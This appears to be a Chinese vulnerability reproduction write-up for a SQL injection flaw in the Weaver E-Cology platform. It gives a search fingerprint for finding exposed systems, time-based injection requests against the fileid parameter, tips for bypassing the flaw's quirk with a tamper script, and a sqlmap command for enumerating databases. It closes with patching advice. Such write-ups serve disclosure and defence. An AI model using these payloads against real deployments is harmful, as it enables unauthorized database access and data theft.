泛微E-Cology SQL注入漏洞复现【QVD-2023-15672】

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、 产品简介

​ 泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。

二、 漏洞概述

​ 由于泛微e-cology未对用户的输入进行有效的过滤，直接将其拼接进了SQL查询语句中，导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息，进一步利用可能获取目标系统权限等。

三、 影响范围

Ecology 9.x 补丁版本 < 10.58.0 &&
Ecology 8.x 补丁版本 < 10.58.0

四、 复现环境

鹰图指纹：
web.icon=“41eca7a9245394106a09b2534d8030df”
截图

五、 漏洞复现

burp PoC 验证

GET /weaver/weaver.file.FileDownloadForOutDoc/?fileid=123+WAITFOR+DELAY+'0:0:5'&isFromOutImg=1 HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

fileid参数是注入点，post请求或者get请求都可以，经过测试，每注入一次，fileid的值（可随意构造）就需要更换一次 ，否则不成功，这也是漏洞比较坑的点。

小龙POC检测
一阵哈拉少

小龙POC传送门: 小龙POC工具

SQLmap直接上手

编写一个每次请求遍历随机数去配合payload实现注入的tamper脚本

POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: closefileid=12*&isFromOutImg=1

尝试注入利用：

python3 sqlmap.py -r post.txt --tamper=ecology_sql_random.py --batch --dbs

六、 修复建议

临时缓解方案
限制访问来源地址，如非必要，不要将系统开放在互联网上。

升级修复方案
目前官方已发布安全补丁，建议受影响用户尽快升级至10.58及以上版本。
https://www.weaver.com.cn/cs/securityDownload.asp#